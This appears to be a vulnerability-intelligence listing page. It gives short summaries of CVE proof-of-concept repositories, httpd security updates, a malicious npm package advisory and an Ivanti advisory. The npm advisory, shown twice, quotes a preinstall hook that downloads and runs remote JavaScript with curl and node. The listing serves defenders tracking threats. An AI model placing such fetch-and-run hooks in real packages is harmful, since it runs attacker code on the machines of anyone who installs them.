pac-exploits-priv

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulne...

Exploit for CVE-2026-1555

CVE-2026-1555: Unauthenticated Arbitrary File Upload in WebSta...

Exploit for CVE-2026-20230

CVE-2026-20230 Scanner A Python-based scanner and validation...

Exploit for Deserialization of Untrusted Data in Jenkins

CVE-2026-53435 — Jenkins Deserialization → Arbitrary File Read...

OESA-2026-2638 httpd security update

Apache HTTP Server is a powerful and flexible HTTP/1.1 compliant web server. Security Fixes: A vulnerability was found in Apache HTTP Server Web Server affected version not known. It has been rated as critical.Using CWE to declare the problem leads to CWE-404. The product does not release or...

OESA-2026-2611 mod_http2 security update

The modh2 Apache httpd module implements the HTTP2 protocol h2+h2c on top of libnghttp2 for httpd 2.4 servers. Security Fixes: A vulnerability was found in Apache HTTP Server Web Server affected version not known. It has been rated as critical.Using CWE to declare the problem leads to CWE-404. Th...

CVE-2026-53999

creationtimestamp| type| source ---|---|--- 2026-06-11 23:10:49+00:00| published-proof-of-concept| https://github.com/radius-project/radius/security/advisories/GHSA-fp5j-4fj2-4jvq...

CVE-2026-44311

creationtimestamp| type| source ---|---|--- 2026-06-11 21:48:31+00:00| published-proof-of-concept| https://github.com/fabricjs/fabric.js/security/advisories/GHSA-w22m-hvvm-xmwx...

CVE-2026-48039

creationtimestamp| type| source ---|---|--- 2026-06-11 13:28:29+00:00| published-proof-of-concept| https://github.com/advisories/GHSA-9gw6-46qc-99vr 2026-06-11 13:28:29+00:00| published-proof-of-concept| https://github.com/advisories/GHSA-9gw6-46qc-99vr...

CVE-2026-47781

creationtimestamp| type| source ---|---|--- 2026-06-11 13:25:28+00:00| published-proof-of-concept| https://github.com/advisories/GHSA-qq6c-99pv-prvf 2026-06-11 13:25:28+00:00| published-proof-of-concept| https://github.com/advisories/GHSA-qq6c-99pv-prvf...

MAL-2026-5646 Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

Exploit for Untrusted Pointer Dereference in Microsoft

CVE...

CVEAlertor

CVEAlertor Get an instant Telegram alert the moment a new C...

Malicious Package

Overview google-cloud-secret-manager-config-poc is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization...

DIG: Oracle-Guided Directed Input Generation for One-Day Vulnerabilities

One-day vulnerabilities pose significant risks due to delayed or incomplete patch adoption. Generating proof-of-concept PoC inputs is therefore essential for assessing real-world impact. The key challenge is identifying necessary constraints for triggering the vulnerability and solving them...

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

CVE-2023-2640 & CVE-2023-32629 GameOverLay - Real Host Root...

Exploit for Improper Input Validation in Drupal

drupalgeddon2-cli A command-line rewrite of the Drupalged...

CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry

Overview On June 9, 2026, Ivanti published a security advisory for two critical vulnerabilities affecting Ivanti Sentry formerly known as MobileIron Sentry, which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end...

CVE-2026-47780

creationtimestamp| type| source ---|---|--- 2026-06-10 08:23:38+00:00| published-proof-of-concept| https://github.com/free5gc/free5gc/security/advisories/GHSA-6gxq-gpr8-xgjp...